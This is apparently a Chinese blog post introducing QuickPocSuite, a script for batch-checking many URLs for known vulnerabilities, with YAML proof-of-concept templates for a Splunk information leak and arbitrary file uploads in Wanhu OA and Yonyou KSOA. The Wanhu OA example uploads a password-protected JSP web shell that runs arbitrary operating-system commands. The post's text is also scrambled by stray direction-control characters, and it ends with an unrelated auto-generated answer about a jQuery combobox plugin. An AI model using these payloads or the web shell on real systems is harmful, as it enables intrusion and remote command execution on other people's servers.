Niu!简单漏洞的快速批量验证脚本

工具介绍

追梦信安@W01fh4cker师傅新造的一个‬轮子,适‮利合‬用简‮的单‬漏洞的批量扫描,例‮只如‬需要在url后面拼接一个payload,然‮根后‬据返‮包回‬判断关键字是‮存否‬在这种。

关注【Hack分享吧】公众号,回复关键字【230514】获取下载链接

对应的yaml格式的poc文件编写起‮非来‬常简单,适‮快合‬速利用。

详细参数:

usage: QuickPocSuite.py [-h] [-y YAML] [-l LIST] [-t THREAD] [-o OUTPUT]

QuickPocSuite v0.0.2 By:W01fh4cker

optional arguments:
  -h, --help            show this help message and exit
  -y YAML, --yaml YAML  the YAML file containing the PoC
  -l LIST, --list LIST  the file containing target URLs
  -t THREAD, --thread THREAD
                        the maximum time in seconds for each request,default: 20
  -o OUTPUT, --output OUTPUT
                        the file to output the results, default: output.txt

使用方法

git clone https://github.com/W01fh4cker/QuickPocSuite.git
cd QuickPocSuite
pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
python QuickPocSuite.py -y <yaml文件地址> -l <需要批量利用的url文件>
# 例如:python QuickPocSuite.py -y splunk-info-disclosure.yaml -l urls.txt

图片

yaml编写方法

适用版本:0.0.2,编写教程:

# 单次GET
author: W01fh4cker
request:
  - 
    method: GET
    payload: /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
    # 自定义请求头,如果不填,则默认设置请求头只包含ua
    headers:
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
    keyword: licenseKeys
    status: 200

# 单次post,以<万户OA smartUpload.jsp 任意文件上传漏洞>为例
author: W01fh4cker
request:
  -
    method: POST
    payload: /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
    headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynNQ8hoU56tfSwBVU
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Cookie: JSESSIONID=PjXnh6bLTzy0ygQf41vWctGPLGkSvkJ6J1yS3ppzJmCvVFQZgm1r!1156443419
        Connection: close
        data: "\
            ------WebKitFormBoundary{{rboundary}}\r\n\
            Content-Disposition: form-data; name=\"photo\"; filename=\"shell.jsp\"\r\n\
            Content-Type: application/octet-stream\r\n\
            \r\n\
            <% if(\"023\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(\"<pre>\"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(\"</pre>\"); } %>\r\n\
            ------WebKitFormBoundary{{rboundary}}\r\n\
            Content-Disposition: form-data; name=\"continueUpload\"\r\n\
            \r\n\
            1\r\n\
            ------WebKitFormBoundary{{rboundary}}\r\n\
            Content-Disposition: form-data; name=\"submit\"\r\n\
            \r\n\
            上传继续\r\n\
            ------WebKitFormBoundary{{rboundary}}--\r\n\
          "
        status: 200

# 单次post+单次get,以<用友-时空KSOA ImageUpload 任意文件上传漏洞>为例
author: W01fh4cker
request:
  -
    method: POST
    payload: /servlet/com.sksoft.bill.ImageUpload?filename=188888.txt&filepath=/
    headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Accept: "*/*"
        Accept-Encoding: gzip, deflate
        Connection: close
    data: 123456789
    status: 200
  -
    method: GET
    payload: /pictures/188888.txt
    headers:
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
    keyword: 123456789
    status: 200

payload为需要在url后面拼接的内容;keyword为存在漏洞的url的界面中出现的关键字。例如:

图片

Todo-list

和fofa/hunter/shodan/zoomeye/quake等网络测绘引擎的联动;
自动对完成扫描的IP进行分析,例如反查域名/ASN/org等;
开发poc仓库,添加更多的poc;
……(你们定,直接提issues,合理的都会满足)
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
niu-combobox 是基于 jQuery 和 Bootstrap 的下拉框插件,用于方便地创建带搜索框、分页、多选等功能的下拉框。在 JSP 中使用 niu-combobox,需要先引入 jQuery 和 Bootstrap 的相关文件,然后在 JSP 页面中引入 niu-combobox 的 CSS 和 JS 文件,最后在页面中使用相应的 HTML 代码即可。 以下是一个示例: 1. 引入 jQuery 和 Bootstrap 的相关文件 ```html <!-- 引入 jQuery --> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <!-- 引入 Bootstrap 样式文件 --> <link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/4.5.3/css/bootstrap.min.css"> <!-- 引入 Bootstrap JavaScript 文件 --> <script src="https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/4.5.3/js/bootstrap.min.js"></script> ``` 2. 引入 niu-combobox 的 CSS 和 JS 文件 ```html <!-- 引入 niu-combobox 样式文件 --> <link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/niuui/1.0.11/niu-combobox.min.css"> <!-- 引入 niu-combobox JavaScript 文件 --> <script src="https://cdn.bootcdn.net/ajax/libs/niuui/1.0.11/niu-combobox.min.js"></script> ``` 3. 在页面中使用 niu-combobox ```html <!-- 创建一个下拉框 --> <select id="mySelect" class="form-control" multiple></select> <!-- 初始化 niu-combobox --> <script> $(function() { $('#mySelect').niucombobox({ url: 'data.json', // 数据源 URL pageSize: 10, // 每页显示的数据条数 searchText: '搜索', // 搜索框提示文字 noDataText: '无数据', // 没有数据时的提示文字 placeholder: '请选择', // 下拉框默认文字 valueField: 'id', // 数据值字段名 textField: 'text', // 数据显示字段名 onSelect: function(selected) { // 选中项发生变化时的回调函数 console.log(selected); } }); }); </script> ``` 其中,data.json 是数据源文件的 URL,需要根据实际情况进行替换。其他配置项的含义可以参考 niu-combobox 的文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值